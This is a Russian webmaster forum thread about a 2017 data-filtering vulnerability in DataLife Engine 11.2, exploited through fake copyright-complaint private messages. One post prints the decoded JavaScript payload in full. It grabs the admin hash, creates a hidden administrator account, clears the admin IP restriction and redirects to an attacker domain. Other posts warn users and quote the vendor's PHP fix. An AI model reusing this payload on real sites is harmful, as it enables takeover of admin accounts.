Редактор темы

Реклама
Реклама

Уязвимость dle 11.2 и ниже недостаточная фильтрация данных

Поделись что за супер антивирус такой
отправил в личку!
это стандартный, я дополнительно использую сторонний антивирус, который блочит все инъекции самостоятельно, и вообще много функций у него
 
отправил в личку!

это стандартный, я дополнительно использую сторонний антивирус, который блочит все инъекции самостоятельно, и вообще много функций у него
он никому не поможет у тех кто поменял пол движка

у меня вообще всё переписано почти - сделал так же как создатели - взял и переделал
 
Последнее редактирование модератором:
кому интересно вот код из закодированной ссылки
Код:
"></a>

<code style='display: none;' id='LJKwqoiDHqewE'></code>
<script>
function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="[email protected]";
var objhttp=A();
objhttp.onreadystatechange = function() 
{
    if (objhttp.readyState == 4) 
    {
        var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ=='));
        var da=r.exec(objhttp.responseText)[2];
        r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp'));
        var dh=r.exec(objhttp.responseText)[2];
        objhttp.open("POST",rp+da+'?mod=editusers&action=list',true);
        objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
        objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1');
        var objhttp2=A();
        objhttp2.onreadystatechange=function()
        {
            if(objhttp2.readyState==4)
            {
                var sd=document.getElementById('LJKwqoiDHqewE');
                sd.innerHTML=objhttp2.responseText.replace(/(<script)/i,'');
                var ael=sd.getElementsByTagName('*');
                var pd='';
                r=new RegExp(atob('XihzYXZlX2Nvbik='));
                for(var i=0;i<ael.length;i++)
                    if(r.test(ael[i].name))
                        pd=pd+ael[i].name+'='+encodeURIComponent(ael[i].value)+'&';
                pd=pd+'save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash='+dh;
                var objhttp3=A();
                objhttp3.open('POST',rp+da+'?mod=options&action=syscon',true);
                objhttp3.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                objhttp3.send(pd);
                window.location.href = "http://g00gleapis.ru/81NJLH";
            }
        }
        objhttp2.open('GET',rp+da+'?mod=options&action=syscon',true);
        objhttp2.send(null);
    }

}
objhttp.open('GET', rp, true);
objhttp.send(null);
</script><a href="http://g00gleapis.ru/81NJLH
 
@volkod, почта с письма напомнила юзвера http://zerocoolpro.biz/forum/members/blagassss.3985/ 😀 если это он - то растет пользователь тот 🙄
код примитивный я про js именно, а вот в пхп чувак покопался что бы найти к чему прицепится. Тут ума сильно не надо было, особенно после того как в дле правили уязвимость с фильтрацией можно было предположить что есть еще дыры такие же.
 
Автор темы
Только вчера прочитал эту тему, и тему с сылкой на дле форум которую Zivler выше кинул где типа ломанули и на тебе, сегодня приходит такая же херь.

Уважаемая администрация веб сайта ***.com,
Материалы, принадлежащие нашему клиенту, размещены на Вашем сайте. Клиент разрешения на их публикацию на указанном веб ресурсе не давал. Существуют основания для запрета клиентом к распространению в сети данных файлов, а также основания, в случае отказа удаления, признания соответствующих действий компрометирующими. Просим удалить материалы в течение 3-х рабочих дней со дня получения данного письма. Данное письмо просим считать официальным электронным уведомлением*, которое является зарегистрированным в соответствующей электронной базе t&p, заверено электронной подписью и может быть использовано t&p в качестве аргумента в случае возникновения дополнительных разбирательств.

Ссылка на материал
_________
*зафиксирован t&p как официальное средство уведомления состоянием на 22 марта 2017 года

С уважением, Екатерина Стрельцова
Ведущий специалист t&p
tokarevpartners.ru
Regards, Kate Stleltzova
 
Последнее редактирование модератором:
Автор темы
@Ломоносов, при чем этот спам и данная тема? Письма правообладателей всегда приходили и будут приходить, но никак не в ЛС а на почту.
 
@Ломоносов, при чем этот спам и данная тема? Письма правообладателей всегда приходили и будут приходить, но никак не в ЛС а на почту.
Это не просто абуза, каких миллион приходит. Такой месседж мне пришел именно на почту. В этом сообщении есть ссылка на материал. При клике начинает исполняться скрипт, злоумышленник получает права админа и начинат чудить. Выше кидали ссылку на форум ДЛЕ, где чел подробно рассказывает как его точно так ломанули. А написал я это, потому что через день после того как я прочитал эту тему, мне пришла аналогичная херь. Еслиб не прочитал, может на автомате бы и кликнул по вредоссылке=)
 
Автор темы
@Ломоносов, вот то что мне пришло! Никаких ссылок нет кроме как ссылка на главную страницу моего сайта:
Уважаемый kinogo,

уведомляем вас о том, что на сайте http://site.ru/ вам было отправлено персональное сообщение.

------------------------------------------------
Краткая информация о сообщении
------------------------------------------------

Отправитель: abuse.russian
Дата получения: 21 марта 2017 23:25
Заголовок: Жалоба на материал размещенный на site.ru

------------------------------------------------
Текст сообщения
------------------------------------------------

Уважаемая администрация веб сайта kinogo8.top,
Материалы, принадлежащие нашему клиенту, размещены на Вашем сайте. Клиент разрешения на их публикацию на указанном веб ресурсе не давал. Существуют основания для запрета клиентом к распространению в сети данных файлов, а также основания, в случае отказа удаления, признания соответствующих действий компрометирующими. Просим удалить материалы в течение 3-х рабочих дней со дня получения данного письма. Данное письмо просим считать официальным электронным уведомлением*, которое является зарегистрированным в соответствующей электронной базе t&amp;p, заверено электронной подписью и может быть использовано t&amp;p в качестве аргумента в случае возникновения дополнительных разбирательств.Ссылка на материал
_________
*зафиксирован t&amp;p как официальное средство уведомления состоянием на 21 марта 2017 годаС уважением, Екатерина Стрельцова
Ведущий специалист t&amp;p
tokarevpartners.ru
Regards, Kate Stleltzova
tokarevpartners.ru

С уважением,

Администрация http://site.ru/
ссылка только в начале и в конце где http:// стоит. Более никаких ссылок не было.

Так же нет никаких документов ни каких ссылок ни ссылки на сам материал ни названия материала на который пришла жалоба!

Вполне возможно что у меня сработал вовремя установленный фикс...

PS да и вообще при просмотре каких-либо ссылок на почте надо смотреть что прописывается в href к ссылке, а не переходить по всем ссылкам.
 
На dle-news обновился пост по поводу уязвимости

https://dle-news.ru/bags/v112/1715-nedostatochnaya-filtraciya-dannyh.html

Далее откройте файл: /engine/ajax/typograf.php и найдите:

PHP:
$txt = trim( convert_unicode( $_POST['txt'], $config['charset'] ) );

ниже добавьте:

PHP:
require_once ENGINE_DIR . '/classes/parse.class.php';
$parse = new ParseFilter();
$txt = $parse->process( $txt );
$txt = preg_replace( "/javascript:/i", "j&#1072;vascript&#58;", $txt );
$txt = preg_replace( "/data:/i", "d&#1072;ta:", $txt );
 
Аналогично. Только я вот блин кликнул. Подскажите какие файлы смотреть что удалять?
 
У меня данный фикс стоит, но всё равно пришло сообщение. Правда, без ссылки. Видимо, этот фикс и спас 🙂
 
Пришло только что
upload_2018-10-15_23-52-18.png upload_2018-10-15_23-53-4.png
 

Похожие темы Последние темы Популярные темы

Назад
Сверху